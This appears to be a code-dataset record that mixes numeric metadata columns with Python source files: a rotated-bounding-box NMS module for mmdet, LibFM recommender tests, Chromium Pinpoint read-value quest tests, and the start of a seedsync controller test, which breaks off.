| 0.145833
| 0.114583
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c6c68304a1eea43917f9e3a907434b4aa9382a3
| 5,055
|
py
|
Python
|
mmdet/core/post_processing/rbbox_nms.py
|
GuoBo98/ShipDet
|
2979c39c5a56be3b99ba77833cfe556a8a0fc97e
|
[
"Apache-2.0"
] | null | null | null |
mmdet/core/post_processing/rbbox_nms.py
|
GuoBo98/ShipDet
|
2979c39c5a56be3b99ba77833cfe556a8a0fc97e
|
[
"Apache-2.0"
] | null | null | null |
mmdet/core/post_processing/rbbox_nms.py
|
GuoBo98/ShipDet
|
2979c39c5a56be3b99ba77833cfe556a8a0fc97e
|
[
"Apache-2.0"
] | null | null | null |
import torch
from mmdet.ops.nms.rnms_wrapper import py_cpu_nms_poly_fast
from mmdet.ops.nms import rnms_wrapper
from mmdet.ops.poly_nms import poly_nms_wrapper
from mmdet.core import RotBox2Polys, RotBox2Polys_torch
import time
# TODO: refactor the code
# Debug switch: when True, multiclass_nms_rbbox skips the per-class NMS call
# and returns the raw thresholded detections (used to test with NMS canceled).
DEBUG = False
def multiclass_nms_rbbox(multi_bboxes,
                         multi_scores,
                         score_thr,
                         nms_cfg,
                         max_num=-1,
                         score_factors=None):
    """
    NMS for multi-class rotated bboxes.

    :param multi_bboxes: Tensor of shape (n, 5) (one rotated box shared by
        all classes) or (n, 5 * num_classes) (one 5-number box per class);
        boxes are converted to polygons via RotBox2Polys before NMS.
    :param multi_scores: Tensor of shape (n, num_classes + 1); the last
        column is never visited by the class loop below (presumably the
        background class -- confirm against the head that produces it).
    :param score_thr: boxes with class score <= this threshold are dropped.
    :param nms_cfg: dict with a 'type' key selecting the NMS op
        ('poly_nms' dispatches to poly_nms_wrapper, anything else to
        rnms_wrapper); remaining keys are forwarded to the op.
    :param max_num: keep at most this many detections overall; -1 keeps all.
    :param score_factors: optional per-box multipliers applied to scores.
    :return: (bboxes, labels); bboxes has 9 columns (polygon coordinates
        plus trailing score, per the (0, 9) empty fallback), labels is a
        LongTensor of 0-based class indices.
    """
    #TODO:chech size
    num_classes = multi_scores.size(1) - 1
    bboxes, labels = [], []
    nms_cfg_ = nms_cfg.copy()  # copied so pop() below doesn't mutate the caller's cfg
    # nms_type = nms_cfg_.pop('type', 'nms')
    # nms_op = py_cpu_nms_poly_fast
    nms_type = nms_cfg_.pop('type', 'nms')
    # TODO: refactor it
    if nms_type == 'poly_nms':
        nms_op = getattr(poly_nms_wrapper, nms_type)
    else:
        nms_op = getattr(rnms_wrapper, nms_type)
    for i in range(num_classes):
        # Mask of boxes whose score for class i clears the threshold.
        cls_inds = multi_scores[:, i] > score_thr
        if not cls_inds.any():
            continue
        # get bboxes and scores of this class
        if multi_bboxes.shape[1] == 5:
            _bboxes = multi_bboxes[cls_inds, :]
        else:
            #TODO:check this
            # import pdb
            # pdb.set_trace()
            _bboxes = multi_bboxes[cls_inds, i * 5: (i + 1) * 5]
        # Convert rotated boxes to polygons via a CPU/NumPy round-trip, then
        # move back to the scores' device (the torch variants are left
        # commented out below).
        _bboxes = torch.from_numpy(RotBox2Polys(_bboxes.cpu().numpy())).to(multi_scores.device)
        # _bboxes = RotBox2Polys_torch(_bboxes)
        # _bboxes = RotBox2Polys_torch(_bboxes.cpu()).to(multi_scores.device)
        _scores = multi_scores[cls_inds, i]
        if score_factors is not None:
            _scores *= score_factors[cls_inds]
        # Detections for this class: polygon coords with the score appended
        # as the last column.
        cls_dets = torch.cat([_bboxes, _scores[:, None]], dim=1)
        # TODO: figure out the nms_cfg
        if not DEBUG:
            # start = time.clock()
            cls_dets, _ = nms_op(cls_dets, **nms_cfg_)
            # elapsed = (time.clock() - start)
            # print("Time used:", elapsed)
            # import pdb
            # pdb.set_trace()
        #TODO:check this
        cls_labels = multi_bboxes.new_full(
            (cls_dets.shape[0], ), i, dtype=torch.long)
        bboxes.append(cls_dets)
        labels.append(cls_labels)
    if len(bboxes) > 0:
        bboxes = torch.cat(bboxes)
        labels = torch.cat(labels)
        # Cap the total number of detections by score.
        # NOTE(review): when max_num == -1 (default) this branch never
        # triggers, since shape[0] >= 0 > -1 keeps everything.
        if bboxes.shape[0] > max_num:
            _, inds = bboxes[:, -1].sort(descending=True)
            inds = inds[:max_num]
            bboxes = bboxes[inds]
            labels = labels[inds]
    else:
        # No class survived thresholding: empty (0, 9) boxes, empty labels.
        bboxes = multi_bboxes.new_zeros((0, 9))
        labels = multi_bboxes.new_zeros((0, ), dtype=torch.long)
    return bboxes, labels
def Pesudomulticlass_nms_rbbox(multi_bboxes,
                               multi_scores,
                               score_thr,
                               max_num=-1,
                               score_factors=None):
    """Score-threshold multi-class rotated boxes WITHOUT applying NMS.

    Same selection and polygon-conversion pipeline as multiclass_nms_rbbox,
    but the per-class NMS step is omitted ("pseudo" NMS). Column 0 of
    multi_scores is skipped by the class loop (presumably background —
    verify against the head that produces it); output labels start at 0.

    :param multi_bboxes: Tensor of shape (n, 5) or (n, #class * 5).
    :param multi_scores: Tensor of shape (n, #class).
    :param score_thr: float score threshold.
    :param max_num: keep at most this many boxes, highest scores first;
        non-positive (the default) keeps all.
    :param score_factors: optional per-box score multipliers.
    :return: (bboxes, labels) — bboxes (k, 9), labels (k,).
    """
    num_classes = multi_scores.shape[1]
    bboxes, labels = [], []
    for i in range(1, num_classes):
        cls_inds = multi_scores[:, i] > score_thr
        if not cls_inds.any():
            continue
        # Class-agnostic (n, 5) boxes or the per-class 5-column slice.
        if multi_bboxes.shape[1] == 5:
            _bboxes = multi_bboxes[cls_inds, :]
        else:
            _bboxes = multi_bboxes[cls_inds, i * 5:(i + 1) * 5]
        # Rotated boxes -> 8-point polygons via CPU/numpy roundtrip.
        _bboxes = torch.from_numpy(
            RotBox2Polys(_bboxes.cpu().numpy())).to(multi_scores.device)
        _scores = multi_scores[cls_inds, i]
        if score_factors is not None:
            _scores *= score_factors[cls_inds]
        cls_dets = torch.cat([_bboxes, _scores[:, None]], dim=1)
        cls_labels = multi_bboxes.new_full(
            (cls_dets.shape[0], ), i - 1, dtype=torch.long)
        bboxes.append(cls_dets)
        labels.append(cls_labels)
    if bboxes:
        bboxes = torch.cat(bboxes)
        labels = torch.cat(labels)
        # BUGFIX: only truncate for a positive max_num; the default -1 used
        # to drop the lowest-scoring box via inds[:-1].
        if max_num > 0 and bboxes.shape[0] > max_num:
            _, inds = bboxes[:, -1].sort(descending=True)
            inds = inds[:max_num]
            bboxes = bboxes[inds]
            labels = labels[inds]
    else:
        bboxes = multi_bboxes.new_zeros((0, 9))
        labels = multi_bboxes.new_zeros((0, ), dtype=torch.long)
    return bboxes, labels
| 32.197452
| 95
| 0.573689
| 642
| 5,055
| 4.23053
| 0.154206
| 0.064801
| 0.037555
| 0.019146
| 0.795655
| 0.767673
| 0.767673
| 0.767673
| 0.749264
| 0.749264
| 0
| 0.010995
| 0.31632
| 5,055
| 156
| 96
| 32.403846
| 0.774884
| 0.225717
| 0
| 0.715909
| 0
| 0
| 0.003961
| 0
| 0
| 0
| 0
| 0.019231
| 0
| 1
| 0.022727
| false
| 0
| 0.068182
| 0
| 0.113636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c9df60c5585d70441032d36c1683499595c330e
| 3,850
|
py
|
Python
|
tests/test_libfm.py
|
lematt1991/RecLab
|
7ba212ac2ae346fb6dfeec232eef652d7f26e193
|
[
"MIT"
] | 51
|
2020-09-17T08:51:42.000Z
|
2022-03-26T20:44:48.000Z
|
tests/test_libfm.py
|
kiminh/RecLab
|
7fd29d1c780e91910008a322b04e1b1149a203c8
|
[
"MIT"
] | 25
|
2020-09-04T00:12:44.000Z
|
2021-10-05T02:21:58.000Z
|
tests/test_libfm.py
|
kiminh/RecLab
|
7fd29d1c780e91910008a322b04e1b1149a203c8
|
[
"MIT"
] | 6
|
2020-11-30T03:34:25.000Z
|
2022-02-08T18:27:48.000Z
|
"""Tests for the LibFM recommender."""
from reclab.recommenders import LibFM
from . import utils
def test_sgd_predict():
    """Check LibFM's SGD solver reaches an acceptable RMSE on ML-100K."""
    params = dict(
        num_user_features=0,
        num_item_features=0,
        num_rating_features=0,
        max_num_users=utils.NUM_USERS_ML100K,
        max_num_items=utils.NUM_ITEMS_ML100K,
        method='sgd',
        learning_rate=0.003,
        num_two_way_factors=8,
        bias_reg=0.04,
        one_way_reg=0.04,
        two_way_reg=0.04,
        num_iter=128,
        seed=0,
    )
    utils.test_predict_ml100k(LibFM(**params), rmse_threshold=1.1)
def test_sgd_recommend():
    """Check LibFM's SGD solver produces sensible recommendations."""
    params = dict(
        num_user_features=0,
        num_item_features=0,
        num_rating_features=0,
        max_num_users=utils.NUM_USERS_SIMPLE,
        max_num_items=utils.NUM_ITEMS_SIMPLE,
        method='sgd',
        learning_rate=0.01,
        num_two_way_factors=8,
        num_iter=128,
        seed=0,
    )
    utils.test_recommend_simple(LibFM(**params))
def test_mcmc_predict():
    """Check LibFM's MCMC solver reaches an acceptable RMSE on ML-100K."""
    params = dict(
        num_user_features=0,
        num_item_features=0,
        num_rating_features=0,
        max_num_users=utils.NUM_USERS_ML100K,
        max_num_items=utils.NUM_ITEMS_ML100K,
        method='mcmc',
        num_two_way_factors=8,
        num_iter=128,
        seed=0,
    )
    utils.test_predict_ml100k(LibFM(**params), rmse_threshold=1.1)
def test_mcmc_recommend():
    """Check LibFM's MCMC solver produces sensible recommendations."""
    params = dict(
        num_user_features=0,
        num_item_features=0,
        num_rating_features=0,
        max_num_users=utils.NUM_USERS_SIMPLE,
        max_num_items=utils.NUM_ITEMS_SIMPLE,
        method='mcmc',
        num_two_way_factors=8,
        num_iter=128,
        seed=0,
    )
    utils.test_recommend_simple(LibFM(**params))
def test_als_predict():
    """Check LibFM's ALS solver reaches an acceptable RMSE on ML-100K."""
    params = dict(
        num_user_features=0,
        num_item_features=0,
        num_rating_features=0,
        max_num_users=utils.NUM_USERS_ML100K,
        max_num_items=utils.NUM_ITEMS_ML100K,
        method='als',
        num_two_way_factors=8,
        reg=0.02,
        num_iter=128,
        seed=0,
    )
    utils.test_predict_ml100k(LibFM(**params), rmse_threshold=1.4)
def test_als_recommend():
    """Check LibFM's ALS solver produces sensible recommendations."""
    params = dict(
        num_user_features=0,
        num_item_features=0,
        num_rating_features=0,
        max_num_users=utils.NUM_USERS_SIMPLE,
        max_num_items=utils.NUM_ITEMS_SIMPLE,
        method='als',
        num_two_way_factors=8,
        num_iter=128,
        seed=0,
    )
    utils.test_recommend_simple(LibFM(**params))
| 40.957447
| 97
| 0.526753
| 422
| 3,850
| 4.469194
| 0.146919
| 0.085896
| 0.076352
| 0.063627
| 0.917815
| 0.891835
| 0.779427
| 0.767232
| 0.767232
| 0.767232
| 0
| 0.043745
| 0.406234
| 3,850
| 93
| 98
| 41.397849
| 0.781277
| 0.128052
| 0
| 0.797297
| 0
| 0
| 0.006022
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081081
| false
| 0
| 0.027027
| 0
| 0.108108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7cc13264bfe954dfc0872eaa2f6fefea7461345f
| 20,767
|
py
|
Python
|
dashboard/dashboard/pinpoint/models/quest/read_value_test.py
|
ncalexan/catapult
|
d21a98f0ee0bc0394eb93922d0b274fd6ac281d5
|
[
"BSD-3-Clause"
] | null | null | null |
dashboard/dashboard/pinpoint/models/quest/read_value_test.py
|
ncalexan/catapult
|
d21a98f0ee0bc0394eb93922d0b274fd6ac281d5
|
[
"BSD-3-Clause"
] | null | null | null |
dashboard/dashboard/pinpoint/models/quest/read_value_test.py
|
ncalexan/catapult
|
d21a98f0ee0bc0394eb93922d0b274fd6ac281d5
|
[
"BSD-3-Clause"
] | 1
|
2019-04-21T23:48:15.000Z
|
2019-04-21T23:48:15.000Z
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import unittest
import mock
from dashboard.pinpoint.models.quest import read_value
from tracing.value import histogram_set
from tracing.value import histogram as histogram_module
from tracing.value.diagnostics import generic_set
from tracing.value.diagnostics import reserved_infos
# Minimal argument dicts accepted by the quests' FromDict constructors;
# individual tests copy and extend these.
_BASE_ARGUMENTS_HISTOGRAMS = {'benchmark': 'speedometer'}
_BASE_ARGUMENTS_GRAPH_JSON = {
    'benchmark': 'base_perftests',
    'chart': 'chart_name',
    'trace': 'trace_name',
}
class ReadHistogramsJsonValueQuestTest(unittest.TestCase):
  """Tests FromDict construction of ReadHistogramsJsonValue quests."""

  def testMinimumArguments(self):
    quest = read_value.ReadHistogramsJsonValue.FromDict(
        _BASE_ARGUMENTS_HISTOGRAMS)
    self.assertEqual(
        quest,
        read_value.ReadHistogramsJsonValue('speedometer/perf_results.json'))

  def testAllArguments(self):
    arguments = dict(_BASE_ARGUMENTS_HISTOGRAMS,
                     chart='timeToFirst',
                     tir_label='pcv1-cold',
                     trace='trace_name',
                     statistic='avg')
    quest = read_value.ReadHistogramsJsonValue.FromDict(arguments)
    self.assertEqual(
        quest,
        read_value.ReadHistogramsJsonValue(
            'speedometer/perf_results.json', 'timeToFirst',
            'pcv1-cold', 'trace_name', 'avg'))

  def testWindows(self):
    # A Windows bot dimension flips the results path separator.
    arguments = dict(_BASE_ARGUMENTS_HISTOGRAMS,
                     dimensions=[{'key': 'os', 'value': 'Windows-10'}])
    quest = read_value.ReadHistogramsJsonValue.FromDict(arguments)
    self.assertEqual(
        quest,
        read_value.ReadHistogramsJsonValue('speedometer\\perf_results.json'))
class ReadGraphJsonValueQuestTest(unittest.TestCase):
  """Tests FromDict construction of ReadGraphJsonValue quests."""

  def testMinimumArguments(self):
    quest = read_value.ReadGraphJsonValue.FromDict(_BASE_ARGUMENTS_GRAPH_JSON)
    self.assertEqual(
        quest,
        read_value.ReadGraphJsonValue(
            'base_perftests/perf_results.json', 'chart_name', 'trace_name'))

  def testMissingChart(self):
    # An absent 'chart' key becomes a None chart argument.
    arguments = {key: value for key, value in _BASE_ARGUMENTS_GRAPH_JSON.items()
                 if key != 'chart'}
    quest = read_value.ReadGraphJsonValue.FromDict(arguments)
    self.assertEqual(
        quest,
        read_value.ReadGraphJsonValue(
            'base_perftests/perf_results.json', None, 'trace_name'))

  def testMissingTrace(self):
    # An absent 'trace' key becomes a None trace argument.
    arguments = {key: value for key, value in _BASE_ARGUMENTS_GRAPH_JSON.items()
                 if key != 'trace'}
    quest = read_value.ReadGraphJsonValue.FromDict(arguments)
    self.assertEqual(
        quest,
        read_value.ReadGraphJsonValue(
            'base_perftests/perf_results.json', 'chart_name', None))
class _ReadValueExecutionTest(unittest.TestCase):
  """Shared fixture for quest execution tests.

  Patches dashboard.services.isolate.Retrieve so tests can stub isolate
  contents, and provides assertion helpers for the common outcomes.
  """

  def setUp(self):
    # Replace the isolate Retrieve service for the duration of each test.
    patcher = mock.patch('dashboard.services.isolate.Retrieve')
    self._retrieve = patcher.start()
    self.addCleanup(patcher.stop)

  def SetOutputFileContents(self, contents):
    """Stubs two Retrieve calls: the file map, then the output JSON."""
    self._retrieve.side_effect = (
        '{"files": {"chartjson-output.json": {"h": "output json hash"}}}',
        json.dumps(contents),
    )

  def assertReadValueError(self, execution):
    """Asserts the execution failed with a ReadValueError as the cause."""
    self.assertTrue(execution.completed)
    self.assertTrue(execution.failed)
    # Python 2 only: basestring covers both str and unicode tracebacks.
    self.assertIsInstance(execution.exception, basestring)
    last_exception_line = execution.exception.splitlines()[-1]
    self.assertTrue(last_exception_line.startswith('ReadValueError'))

  def assertReadValueSuccess(self, execution):
    """Asserts the execution completed cleanly with no result arguments."""
    self.assertTrue(execution.completed)
    self.assertFalse(execution.failed)
    self.assertEqual(execution.result_arguments, {})

  def assertRetrievedOutputJson(self):
    """Asserts Retrieve was called for the file map then the output JSON."""
    expected_calls = [
        mock.call('server', 'output hash'),
        mock.call('server', 'output json hash'),
    ]
    self.assertEqual(self._retrieve.mock_calls, expected_calls)
class ReadHistogramsJsonValueTest(_ReadValueExecutionTest):
  """Execution tests for the ReadHistogramsJsonValue quest.

  The repeated histogram/diagnostic setup from the original tests is
  factored into _SampledHistogram, _UploadHistograms and _Run; each test
  keeps its original quest arguments and assertions.
  """

  def _SampledHistogram(self, name='hist', samples=(0, 1, 2)):
    """Returns a 'count' Histogram with the given sample values added."""
    hist = histogram_module.Histogram(name, 'count')
    for value in samples:
      hist.AddSample(value)
    return hist

  def _UploadHistograms(self, hists, tir_label=None, story=None):
    """Wraps hists in a HistogramSet, adds the optional shared STORY_TAGS
    and STORIES diagnostics, and installs it as the isolate output."""
    histograms = histogram_set.HistogramSet(hists)
    if tir_label is not None:
      histograms.AddSharedDiagnosticToAllHistograms(
          reserved_infos.STORY_TAGS.name,
          generic_set.GenericSet([tir_label]))
    if story is not None:
      histograms.AddSharedDiagnosticToAllHistograms(
          reserved_infos.STORIES.name,
          generic_set.GenericSet([story]))
    self.SetOutputFileContents(histograms.AsDicts())
    return histograms

  def _Run(self, quest):
    """Starts the quest against the canned isolate and polls it once."""
    execution = quest.Start(None, 'server', 'output hash')
    execution.Poll()
    return execution

  def testReadHistogramsJsonValue(self):
    hist = self._SampledHistogram()
    self._UploadHistograms([hist], tir_label='group:tir_label', story='story')
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist.name, 'tir_label', 'story')
    execution = self._Run(quest)
    self.assertReadValueSuccess(execution)
    self.assertEqual(execution.result_values, (0, 1, 2))
    self.assertRetrievedOutputJson()

  def testReadHistogramsJsonValueStoryNeedsEscape(self):
    hist = self._SampledHistogram()
    self._UploadHistograms(
        [hist], tir_label='group:tir_label', story='http://story')
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist.name, 'tir_label', 'http://story')
    execution = self._Run(quest)
    self.assertReadValueSuccess(execution)
    self.assertEqual(execution.result_values, (0, 1, 2))
    self.assertRetrievedOutputJson()

  def testReadHistogramsJsonValueStatistic(self):
    hist = self._SampledHistogram()
    self._UploadHistograms([hist], tir_label='group:tir_label', story='story')
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist.name,
        'tir_label', 'story', statistic='avg')
    execution = self._Run(quest)
    self.assertReadValueSuccess(execution)
    self.assertEqual(execution.result_values, (1,))
    self.assertRetrievedOutputJson()

  def testReadHistogramsJsonValueStatisticNoSamples(self):
    hist = self._SampledHistogram(samples=())
    self._UploadHistograms([hist], tir_label='group:tir_label', story='story')
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist.name,
        'tir_label', 'story', statistic='avg')
    execution = self._Run(quest)
    self.assertReadValueError(execution)

  def testReadHistogramsJsonValueMultipleHistograms(self):
    # Two histograms share a name; their samples are concatenated.
    hist = self._SampledHistogram()
    hist2 = self._SampledHistogram()
    hist3 = self._SampledHistogram('some_other_histogram', (3, 4, 5))
    self._UploadHistograms(
        [hist, hist2, hist3], tir_label='group:tir_label', story='story')
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist.name, 'tir_label', 'story')
    execution = self._Run(quest)
    self.assertReadValueSuccess(execution)
    self.assertEqual(execution.result_values, (0, 1, 2, 0, 1, 2))
    self.assertRetrievedOutputJson()

  def testReadHistogramsTraceUrls(self):
    hist = self._SampledHistogram(samples=(0,))
    hist.diagnostics[reserved_infos.TRACE_URLS.name] = (
        generic_set.GenericSet(['trace_url1', 'trace_url2']))
    hist2 = self._SampledHistogram('hist2', ())
    hist2.diagnostics[reserved_infos.TRACE_URLS.name] = (
        generic_set.GenericSet(['trace_url3']))
    hist3 = self._SampledHistogram('hist3', ())
    hist3.diagnostics[reserved_infos.TRACE_URLS.name] = (
        generic_set.GenericSet(['trace_url2']))
    self._UploadHistograms([hist, hist2, hist3])
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist_name=hist.name)
    execution = self._Run(quest)
    self.assertReadValueSuccess(execution)
    self.assertEqual(execution.result_values, (0,))
    # Trace URLs from every histogram are deduplicated into the details.
    self.assertEqual(
        {
            'completed': True,
            'exception': None,
            'details': [
                {
                    'key': 'trace',
                    'value': 'trace_url1',
                    'url': 'trace_url1',
                },
                {
                    'key': 'trace',
                    'value': 'trace_url2',
                    'url': 'trace_url2',
                },
                {
                    'key': 'trace',
                    'value': 'trace_url3',
                    'url': 'trace_url3',
                },
            ],
        },
        execution.AsDict())
    self.assertRetrievedOutputJson()

  def testReadHistogramsDiagnosticRefSkipTraceUrls(self):
    hist = self._SampledHistogram(samples=(0,))
    hist.diagnostics[reserved_infos.TRACE_URLS.name] = (
        generic_set.GenericSet(['trace_url1', 'trace_url2']))
    hist2 = self._SampledHistogram('hist2', ())
    hist2.diagnostics[reserved_infos.TRACE_URLS.name] = (
        generic_set.GenericSet(['trace_url3']))
    # Setting a guid turns the diagnostic into a reference, which the
    # reader skips.
    hist2.diagnostics[reserved_infos.TRACE_URLS.name].guid = 'foo'
    self._UploadHistograms([hist, hist2])
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist_name=hist.name)
    execution = self._Run(quest)
    self.assertReadValueSuccess(execution)
    self.assertEqual(execution.result_values, (0,))
    self.assertEqual(
        {
            'completed': True,
            'exception': None,
            'details': [
                {
                    'key': 'trace',
                    'value': 'trace_url1',
                    'url': 'trace_url1',
                },
                {
                    'key': 'trace',
                    'value': 'trace_url2',
                    'url': 'trace_url2',
                },
            ],
        },
        execution.AsDict())
    self.assertRetrievedOutputJson()

  def testReadHistogramsJsonValueWithNoTirLabel(self):
    hist = self._SampledHistogram()
    self._UploadHistograms([hist], tir_label='group:tir_label')
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist_name=hist.name, tir_label='tir_label')
    execution = self._Run(quest)
    self.assertReadValueSuccess(execution)
    self.assertEqual(execution.result_values, (0, 1, 2))
    self.assertRetrievedOutputJson()

  def testReadHistogramsJsonValueWithNoStory(self):
    hist = self._SampledHistogram()
    self._UploadHistograms([hist], story='story')
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist_name=hist.name, story='story')
    execution = self._Run(quest)
    self.assertReadValueSuccess(execution)
    self.assertEqual(execution.result_values, (0, 1, 2))
    self.assertRetrievedOutputJson()

  def testReadHistogramsJsonValueSummaryTIRLabel(self):
    samples = []
    hists = []
    for i in xrange(10):
      hist = self._SampledHistogram()
      hist.diagnostics[reserved_infos.STORIES.name] = (
          generic_set.GenericSet(['story%d' % i]))
      hists.append(hist)
      samples.extend(hist.sample_values)
    self._UploadHistograms(hists, tir_label='group:tir_label')
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist_name=hists[0].name,
        tir_label='tir_label')
    execution = self._Run(quest)
    self.assertReadValueSuccess(execution)
    self.assertEqual(execution.result_values, (sum(samples),))
    self.assertRetrievedOutputJson()

  def testReadHistogramsJsonValueSummary(self):
    samples = []
    hists = []
    # Two story groups, ten stories each, all sharing the histogram name.
    for group, story_prefix in (('group:tir_label1', 'story'),
                                ('group:tir_label2', 'another_story')):
      for i in xrange(10):
        hist = self._SampledHistogram()
        hist.diagnostics[reserved_infos.STORIES.name] = (
            generic_set.GenericSet(['%s%d' % (story_prefix, i)]))
        hist.diagnostics[reserved_infos.STORY_TAGS.name] = (
            generic_set.GenericSet([group]))
        hists.append(hist)
        samples.extend(hist.sample_values)
    self._UploadHistograms(hists, tir_label='group:tir_label')
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist_name=hists[0].name)
    execution = self._Run(quest)
    self.assertReadValueSuccess(execution)
    self.assertEqual(execution.result_values, (sum(samples),))
    self.assertRetrievedOutputJson()

  def testReadHistogramsJsonValueSummaryNoHistName(self):
    samples = []
    hists = []
    for i in xrange(10):
      hist = self._SampledHistogram()
      hist.diagnostics[reserved_infos.STORIES.name] = (
          generic_set.GenericSet(['story%d' % i]))
      hist.diagnostics[reserved_infos.STORY_TAGS.name] = (
          generic_set.GenericSet(['group:tir_label1']))
      hists.append(hist)
      samples.extend(hist.sample_values)
    self._UploadHistograms(hists, tir_label='group:tir_label')
    quest = read_value.ReadHistogramsJsonValue('chartjson-output.json')
    execution = self._Run(quest)
    self.assertReadValueSuccess(execution)
    self.assertEqual(execution.result_values, ())
    self.assertRetrievedOutputJson()

  def testReadHistogramsJsonValueWithMissingFile(self):
    self._retrieve.return_value = '{"files": {}}'
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist_name='metric', tir_label='test')
    self.assertReadValueError(self._Run(quest))

  def testReadHistogramsJsonValueEmptyHistogramSet(self):
    self.SetOutputFileContents([])
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist_name='metric', tir_label='test')
    self.assertReadValueError(self._Run(quest))

  def testReadHistogramsJsonValueWithMissingHistogram(self):
    self._UploadHistograms([self._SampledHistogram(samples=())])
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist_name='does_not_exist')
    self.assertReadValueError(self._Run(quest))

  def testReadHistogramsJsonValueWithNoValues(self):
    self._UploadHistograms([self._SampledHistogram(samples=())])
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist_name='chart')
    self.assertReadValueError(self._Run(quest))

  def testReadHistogramsJsonValueTirLabelWithNoValues(self):
    self._UploadHistograms([self._SampledHistogram(samples=())])
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist_name='chart', tir_label='tir_label')
    self.assertReadValueError(self._Run(quest))

  def testReadHistogramsJsonValueStoryWithNoValues(self):
    self._UploadHistograms([self._SampledHistogram(samples=())])
    quest = read_value.ReadHistogramsJsonValue(
        'chartjson-output.json', hist_name='chart', story='story')
    self.assertReadValueError(self._Run(quest))
class ReadGraphJsonValueTest(_ReadValueExecutionTest):
  """Execution tests for the ReadGraphJsonValue quest."""

  def _AssertReadFails(self, contents=None):
    """Runs a 'metric'/'test' quest and expects a ReadValueError.

    With contents=None the isolate has no output file at all; otherwise
    contents becomes the (inadequate) output JSON.
    """
    if contents is None:
      self._retrieve.return_value = '{"files": {}}'
    else:
      self.SetOutputFileContents(contents)
    quest = read_value.ReadGraphJsonValue(
        'base_perftests/perf_results.json', 'metric', 'test')
    execution = quest.Start(None, 'server', 'output hash')
    execution.Poll()
    self.assertReadValueError(execution)

  def testReadGraphJsonValue(self):
    self.SetOutputFileContents(
        {'chart': {'traces': {'trace': ['126444.869721', '0.0']}}})
    quest = read_value.ReadGraphJsonValue(
        'chartjson-output.json', 'chart', 'trace')
    execution = quest.Start(None, 'server', 'output hash')
    execution.Poll()
    self.assertReadValueSuccess(execution)
    self.assertEqual(execution.result_values, (126444.869721,))
    self.assertRetrievedOutputJson()

  def testReadGraphJsonValueWithMissingFile(self):
    self._AssertReadFails()

  def testReadGraphJsonValueWithMissingChart(self):
    self._AssertReadFails({})

  def testReadGraphJsonValueWithMissingTrace(self):
    self._AssertReadFails({'chart': {'traces': {}}})
| 35.805172
| 80
| 0.697693
| 2,001
| 20,767
| 7.092454
| 0.103948
| 0.022196
| 0.027621
| 0.04566
| 0.801297
| 0.768602
| 0.759019
| 0.729848
| 0.721815
| 0.710118
| 0
| 0.008649
| 0.181586
| 20,767
| 579
| 81
| 35.867012
| 0.826371
| 0.007464
| 0
| 0.709746
| 0
| 0
| 0.121555
| 0.03586
| 0
| 0
| 0
| 0
| 0.137712
| 1
| 0.069915
| false
| 0
| 0.016949
| 0
| 0.097458
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b0c06ab75dc62abed4dbd1aab966e153eccaf7f
| 9,689
|
py
|
Python
|
src/python/tests/integration/test_web/test_handler/test_controller.py
|
annihilatethee/seedsync
|
7a0ba915cc570bc12916088baa6eb6bee6f291c9
|
[
"Apache-2.0"
] | 255
|
2017-12-25T00:53:40.000Z
|
2022-03-27T10:29:21.000Z
|
src/python/tests/integration/test_web/test_handler/test_controller.py
|
annihilatethee/seedsync
|
7a0ba915cc570bc12916088baa6eb6bee6f291c9
|
[
"Apache-2.0"
] | 111
|
2018-01-04T10:35:49.000Z
|
2022-03-29T15:12:52.000Z
|
src/python/tests/integration/test_web/test_handler/test_controller.py
|
annihilatethee/seedsync
|
7a0ba915cc570bc12916088baa6eb6bee6f291c9
|
[
"Apache-2.0"
] | 53
|
2017-12-25T09:34:19.000Z
|
2022-03-15T17:53:27.000Z
|
# Copyright 2017, Inderpreet Singh, All rights reserved.
from unittest.mock import MagicMock
from urllib.parse import quote
from tests.integration.test_web.test_web_app import BaseTestWebApp
from controller import Controller
class TestControllerHandler(BaseTestWebApp):
def test_queue(self):
def side_effect(cmd: Controller.Command):
cmd.callbacks[0].on_success()
